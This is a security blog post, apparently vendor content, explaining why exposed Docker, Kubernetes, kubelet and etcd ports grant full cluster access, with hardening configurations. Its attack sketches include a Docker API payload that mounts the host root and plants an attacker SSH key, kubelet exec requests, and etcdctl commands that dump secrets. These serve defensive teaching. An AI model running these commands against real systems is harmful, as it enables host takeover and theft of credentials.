Container and Orchestration APIs: When One Open Port Means Full Cluster Access

Not every open port is created equal
In traditional network security, an open port usually means a service is listening and might be vulnerable. An exposed SSH port might be brute-forced. An open database port might allow unauthorised queries. These are serious, but they tend to have layers of defence: authentication, authorisation, rate limiting, logging.
Container orchestration APIs are different. When Docker's API listens on port 2375 without TLS or authentication, a single HTTP request can deploy a container with the host's filesystem mounted as a volume. That is not a vulnerability to exploit. That is the API working exactly as designed, just for the wrong person. The attacker does not need a CVE, a zero-day, or a password. They need a TCP connection.
This distinction matters because traditional port-based risk assessments do not capture it. A spreadsheet that says "port 2375 - Docker API - medium risk" is dangerously wrong. The risk is not medium. It is root access to the host and, from there, to every other host the Docker daemon can reach.
The ports and what they control
Four groups of ports define the attack surface of a containerised environment. Each represents a different level of control, and all of them are more dangerous than their port numbers suggest.
Docker API: ports 2375 and 2376. Port 2375 is the unencrypted Docker API. Port 2376 is the TLS-encrypted variant. The Docker daemon, by default, listens on a Unix socket that is only accessible locally. But enabling the TCP socket, which many tutorials and deployment guides recommend for remote management, exposes the full Docker API over the network. On port 2375, there is no encryption and no authentication. Anyone who can reach the port can do anything the Docker daemon can do: create containers, mount host volumes, execute commands, pull images, and inspect the environment.
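The exposure usually comes from a one-line configuration change. A daemon.json along these lines (a sketch; the file conventionally lives at /etc/docker/daemon.json) is what many remote-management tutorials suggest, and it is exactly the configuration that opens port 2375 to the network:

```json
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
```

Binding to 0.0.0.0 rather than a dedicated management interface means every network the host is attached to can reach the unauthenticated API.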
Kubernetes API server: port 6443. The Kubernetes API server is the central control plane for the entire cluster. Every kubectl command, every deployment, every secret retrieval goes through this API. Port 6443 is the default HTTPS endpoint. Unlike Docker's port 2375, the Kubernetes API does have authentication and RBAC built in. But misconfigurations are common: anonymous authentication enabled, overly permissive ClusterRoleBindings, service account tokens leaked in logs or environment variables. When the API server is exposed to the internet with any of these misconfigurations, the attacker has cluster-admin access.
Kubelet API: port 10250. The kubelet runs on every node in a Kubernetes cluster and manages the pods on that node. Its API on port 10250 allows direct interaction with running pods, including executing commands inside them. In many cluster configurations, the kubelet's API has weaker authentication than the main API server. Attackers who cannot reach port 6443 may find port 10250 exposed on individual nodes, giving them the ability to run commands in any pod on that node without going through the API server's RBAC controls.
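The exposure is easy to illustrate with the kubelet's own endpoints. In the sketch below, the node address is a documentation IP and the curl invocations are left as comments rather than executed; /pods and /run/... are the kubelet API paths involved.

```shell
NODE="203.0.113.30:10250"   # hypothetical node address

# List every pod on the node, including container names and environment variables:
LIST_URL="https://$NODE/pods"
# Execute a command inside a specific container, bypassing API-server RBAC
# (the <namespace>/<pod>/<container> placeholders are illustrative):
EXEC_URL="https://$NODE/run/<namespace>/<pod>/<container>"

# An attacker who can reach the port would issue, for example:
#   curl -sk "$LIST_URL"
#   curl -sk -X POST "$EXEC_URL" -d "cmd=id"
echo "$LIST_URL"
```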
etcd: ports 2379 and 2380. etcd is the key-value store that holds all Kubernetes cluster state. Every secret, every configuration, every service account token is stored in etcd. Port 2379 is the client API. Port 2380 is the peer communication port used for etcd cluster replication. If an attacker can reach port 2379, they can read every secret in the cluster, including TLS certificates, database passwords, API keys, and service account tokens. They do not need to interact with Kubernetes at all. They read the secrets directly from the backing store.
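Reading that state is a stock etcdctl invocation, not an exploit. The endpoint below is a documentation IP and the commands are left as comments; /registry/secrets/ is the prefix under which Kubernetes stores Secret objects.

```shell
ENDPOINT="http://203.0.113.40:2379"   # hypothetical exposed etcd client port

# With the etcd v3 client, enumerate and read every secret in the cluster
# without ever authenticating to Kubernetes:
#   ETCDCTL_API=3 etcdctl --endpoints="$ENDPOINT" \
#     get /registry/secrets --prefix --keys-only
#   ETCDCTL_API=3 etcdctl --endpoints="$ENDPOINT" \
#     get /registry/secrets/kube-system/ --prefix
echo "$ENDPOINT"
```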
Docker API: from one port to full root access
The Docker API on port 2375 is the clearest example of how container APIs differ from traditional services. Here is what an attack actually looks like, step by step.
An attacker scans a network range and finds port 2375 open. They send a single API call to create a new container using a minimal Linux image, with the host's root filesystem mounted at /mnt/host inside the container. The API responds with a container ID. They start the container. They execute a command inside the container that writes an SSH key to /mnt/host/root/.ssh/authorized_keys. They now have SSH access to the host as root.
The entire sequence takes less than 30 seconds and requires nothing more than curl. There is no exploit involved. No buffer overflow. No authentication bypass. The API did exactly what it was asked to do: create a container, mount a volume, run a command. The only problem is that the person asking was not authorised to do so, and the API had no mechanism to check.
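The sequence above can be sketched as two unauthenticated HTTP calls. Everything here is illustrative: the target is a documentation IP, the SSH key is truncated, and the curl commands are left as comments rather than executed; the endpoints and payload shape are the standard Docker Engine API.

```shell
TARGET="203.0.113.10:2375"   # hypothetical exposed daemon

# Container spec: minimal image, host root filesystem bind-mounted at /mnt/host.
PAYLOAD='{
  "Image": "alpine:latest",
  "Cmd": ["sh", "-c", "mkdir -p /mnt/host/root/.ssh && echo \"ssh-ed25519 AAAA... attacker\" >> /mnt/host/root/.ssh/authorized_keys"],
  "HostConfig": { "Binds": ["/:/mnt/host"] }
}'

# 1. Create the container (the API answers with {"Id": "..."}):
#      curl -s -X POST -H 'Content-Type: application/json' \
#           -d "$PAYLOAD" "http://$TARGET/containers/create"
# 2. Start it, which runs Cmd and plants the key:
#      curl -s -X POST "http://$TARGET/containers/<Id>/start"
echo "$PAYLOAD"
```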
This is not a hypothetical attack chain. Shodan consistently indexes thousands of Docker APIs exposed on port 2375. Automated scanning tools look for this port specifically because the payoff is immediate and guaranteed. Honeypot research has shown that exposed Docker APIs receive exploitation attempts within hours of appearing on the internet. The most common payload is a cryptominer, but the access level supports anything: data exfiltration, ransomware deployment, or using the compromised host as a pivot point for lateral movement.
Kubernetes API: legitimate access, catastrophic exposure
The Kubernetes API server on port 6443 presents a different challenge. Unlike Docker's port 2375, the Kubernetes API is meant to be network-accessible. Developers need to reach it to deploy applications. CI/CD pipelines need to reach it to push updates. Monitoring tools need to reach it to check cluster health. You cannot simply disable network access to the API server and call it secure.
The risk comes from who can reach it and what they can do when they get there.
A Kubernetes cluster where the API server is exposed to the internet and anonymous authentication is enabled allows anyone to query the cluster. Even without anonymous auth, common misconfigurations create equivalent exposure. Service account tokens with cluster-admin privileges get committed to Git repositories. RBAC policies grant * (all verbs) on * (all resources) to the default service account because someone needed to debug a pod and never reverted the change. Admission controllers are disabled because they were "slowing down deployments."
Each of these misconfigurations on its own might not be critical. Combined with an internet-exposed API server, they are catastrophic. An attacker with cluster-admin access can read all secrets (database passwords, API keys, TLS certificates), deploy workloads on any node, modify existing deployments to inject malicious containers, and delete resources to cause outages.
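In manifest form, the kind of leftover binding described above looks like this (the binding name is hypothetical; granting cluster-admin to the default service account is the dangerous part):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: debug-binding          # hypothetical, left over from a debugging session
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin          # all verbs on all resources
subjects:
  - kind: ServiceAccount
    name: default
    namespace: default
```

Every pod that runs with the default service account in that namespace now carries a token with full cluster control.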
The kubelet API on port 10250 compounds this risk. Even in clusters where the API server is properly secured, the kubelet on individual nodes may accept unauthenticated requests. An attacker who finds port 10250 open can list all pods on that node, execute commands inside any pod, and retrieve environment variables that often contain secrets. This is particularly dangerous in cloud environments where nodes may have instance metadata endpoints accessible from within pods, turning a kubelet compromise into a cloud account compromise.
etcd: the cluster's memory, wide open
If the Kubernetes API server is the front door to your cluster, etcd is the vault. It stores every piece of state the cluster manages: pod specifications, service definitions, config maps, and most critically, secrets.
Kubernetes secrets are base64-encoded by default, not encrypted. When you run kubectl create secret, the value is stored in etcd in a form that any client with read access can decode trivially. Encryption at rest for etcd is available but not enabled by default in many deployment methods. This means that direct access to etcd on port 2379 gives an attacker everything in the cluster without needing to authenticate to the Kubernetes API at all.
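The "encoding, not encryption" point is worth seeing concretely. The value below is a made-up example of what etcd actually stores for a secret, and recovering the plaintext takes one command:

```shell
# What etcd stores for a hypothetical database password (base64, not ciphertext):
ENCODED="cGFzc3dvcmQxMjM="

# Anyone with read access recovers the plaintext in one step:
DECODED=$(echo "$ENCODED" | base64 -d)
echo "$DECODED"   # password123
```

Enabling encryption at rest (an EncryptionConfiguration file passed to the API server via --encryption-provider-config) closes this gap for newly written secrets.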
Port 2380, the peer port, is equally sensitive. If an attacker can reach port 2380, they can potentially join the etcd cluster as a new member, gaining full read and write access to all cluster data. This is not an attack that most organisations plan for because etcd peer communication is assumed to happen on a trusted network. But "assumed to be trusted" and "actually isolated" are different things, especially in cloud environments where network segmentation requires explicit configuration.
An etcd backup file that is accessible over the network is equivalent to a database dump that contains every password in the organisation. It deserves the same level of protection and the same level of alarm when it is found exposed.
Why traditional firewall reviews miss these ports
Most firewall rule reviews evaluate ports based on a risk classification that was designed for traditional services. Port 22 is SSH, requires authentication, medium risk. Port 443 is HTTPS, encrypted, low risk. Port 3306 is MySQL, requires authentication, medium-high risk.
Container orchestration ports do not fit this model. Port 2375 looks like "just another service port" in a rule review, but it grants unauthenticated root access. Port 6443 is HTTPS, which might even be classified as lower risk than unencrypted ports. Port 10250 is an obscure port number that many reviewers will not recognise at all. Port 2379 looks like any other application port.
This is where automated rule analysis becomes critical. netbobr includes specific checks for container orchestration ports. PCI-NET-054 flags rules that permit traffic to the Docker API on ports 2375 and 2376. PCI-NET-055 covers the Kubernetes API server on port 6443 and the Kubelet on port 10250. CIS-NET-034 and NIST-NET-044 address container API exposure broadly, catching rules that permit access to any of these ports from networks that should not have it. These checks exist because manual reviews consistently miss container ports, not out of negligence, but because the risk model most reviewers carry in their heads was built before containers existed.
Best practices for container API security
The security model for container orchestration APIs comes down to a simple principle: never expose these APIs to a network broader than the minimum set of hosts that need access. In practice, that means the following.
Docker API: do not use the TCP socket. The Docker daemon's default configuration uses a Unix socket at /var/run/docker.sock. This is accessible only to local processes with the appropriate permissions. There is almost never a legitimate reason to expose the Docker API on a TCP port. If you need remote Docker management, use SSH tunnelling to forward the Unix socket. If you absolutely must expose the TCP socket, use port 2376 with mutual TLS, where both the client and server present certificates. Never, under any circumstances, expose port 2375 on a network interface.
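If remote management is genuinely required, the safe configuration looks roughly like this daemon.json sketch, which requires mutual TLS on port 2376 (certificate paths are placeholders):

```json
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}
```

For the SSH route, no daemon change is needed at all: `docker -H ssh://admin@host ps` tunnels over the existing SSH service while the daemon keeps listening only on the Unix socket.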
Kubernetes API server: restrict network access and harden authentication. The API server needs to be network-accessible, but it does not need to be accessible from everywhere. Use network policies or firewall rules to limit access to the API server to your operations network, your CI/CD pipeline source addresses, and your monitoring infrastructure. Disable anonymous authentication. Audit RBAC policies regularly and remove overly permissive bindings. Enable audit logging so you can detect unusual API access patterns.
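On the authentication and auditing side, the relevant kube-apiserver flags are, as a sketch (file paths are placeholders):

```
--anonymous-auth=false
--authorization-mode=Node,RBAC
--audit-log-path=/var/log/kubernetes/audit.log
--audit-policy-file=/etc/kubernetes/audit-policy.yaml
```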
Kubelet: enable authentication and authorisation. Configure the kubelet to use webhook authentication, which delegates auth decisions to the API server. Set the authorisation mode to Webhook rather than AlwaysAllow. Disable the read-only port (10255) entirely. These settings are not the default in all Kubernetes distributions, which means you need to verify them explicitly.
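As a KubeletConfiguration fragment, those settings look like this (a sketch of the relevant fields, not a complete configuration):

```yaml
apiVersion: kubelet.config.k8s.io/v1beta1
kind: KubeletConfiguration
authentication:
  anonymous:
    enabled: false
  webhook:
    enabled: true          # delegate auth decisions to the API server
authorization:
  mode: Webhook            # never AlwaysAllow
readOnlyPort: 0            # disable the unauthenticated read-only port (10255)
```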
etcd: isolate completely. etcd should only be accessible from the Kubernetes API server nodes. No other system needs direct access to etcd. Use mutual TLS for both client and peer communication. If your etcd cluster runs on dedicated hosts, firewall them so that only the API server hosts can reach ports 2379 and 2380. If etcd runs on the same hosts as the API server (common in smaller clusters), bind etcd to localhost or a dedicated management interface.
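The corresponding etcd flags, as a sketch (the bind address and certificate paths are placeholders), enforce mutual TLS on both the client and peer ports:

```
--listen-client-urls=https://10.0.0.5:2379
--cert-file=/etc/etcd/server.pem
--key-file=/etc/etcd/server-key.pem
--client-cert-auth=true
--trusted-ca-file=/etc/etcd/ca.pem
--listen-peer-urls=https://10.0.0.5:2380
--peer-cert-file=/etc/etcd/peer.pem
--peer-key-file=/etc/etcd/peer-key.pem
--peer-client-cert-auth=true
--peer-trusted-ca-file=/etc/etcd/ca.pem
```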
Network policies as a second layer. Kubernetes network policies can restrict pod-to-pod communication within the cluster, providing defence in depth even if the perimeter is breached. Default-deny network policies that explicitly allow only the traffic each service needs are the container equivalent of a properly configured firewall ruleset. They take effort to build, but they prevent lateral movement within the cluster if a single pod is compromised.
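The default-deny starting point is a short manifest (the namespace name is hypothetical); with this in place, every allowed flow must be stated in an explicit policy:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production      # hypothetical namespace
spec:
  podSelector: {}            # selects every pod in the namespace
  policyTypes:
    - Ingress
    - Egress
```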
The scanning problem you already have
If you have container workloads in production, there is a meaningful chance that at least one of these ports is more exposed than you realise. Cloud provider defaults, developer convenience settings, and infrastructure-as-code templates copied from public repositories all contribute to accidental exposure.
Run a port scan of your infrastructure looking for ports 2375, 2376, 6443, 10250, 10255, 2379, and 2380. Check both internal and external exposure. For cloud environments, review your security groups and network ACLs. For on-premises environments, check your firewall rulesets.
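A minimal version of that scan, assuming only bash and coreutils, probes each port with bash's /dev/tcp (nmap works just as well); here it points at localhost, so substitute your own host list:

```shell
HOST="127.0.0.1"   # placeholder: substitute each host you need to check
PORTS="2375 2376 6443 10250 10255 2379 2380"

RESULTS=""
for p in $PORTS; do
  # /dev/tcp/<host>/<port> succeeds only if something is listening.
  if timeout 1 bash -c "exec 3<>/dev/tcp/$HOST/$p" 2>/dev/null; then
    RESULTS="$RESULTS $p:open"
  else
    RESULTS="$RESULTS $p:closed"
  fi
done
echo "$RESULTS"
```

Any "open" result for these ports on an interface reachable from outside its intended management network deserves immediate investigation.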
When you run your firewall rules through netbobr, the container-specific checks (PCI-NET-054, PCI-NET-055, CIS-NET-034, NIST-NET-044) will flag any rules that permit traffic to these ports from networks that should not have access. This catches the rules that a manual review might overlook, not because the reviewer is careless, but because a rule permitting TCP traffic to port 2375 from the developer VLAN does not look alarming unless you know what port 2375 does.
The asymmetry that matters
Traditional services have a roughly proportional relationship between access and impact. An attacker who reaches a web server can attack the web application. An attacker who reaches a database can attack the database. The blast radius is bounded by the service.
Container orchestration APIs break this proportionality. An attacker who reaches the Docker API on one host can compromise that host and every container on it. An attacker who reaches the Kubernetes API server can compromise the entire cluster. An attacker who reaches etcd can read every secret in every namespace. The blast radius is not bounded by the service. It is bounded by the infrastructure.
This asymmetry is why container API ports deserve their own category in your risk assessment, their own rules in your firewall policy, and their own line items in your security review checklist. Treating port 2375 the same as port 8080 is like treating the master key the same as the office key. They are both keys. They open very different things.
The organisations that manage this well are the ones that recognised early that container orchestration changed the security model, not just the deployment model. The ones that are struggling are the ones that deployed containers at speed, used the defaults, and never went back to check which ports were listening and who could reach them. If you have not checked recently, now is the time. The automated scanners have already checked for you.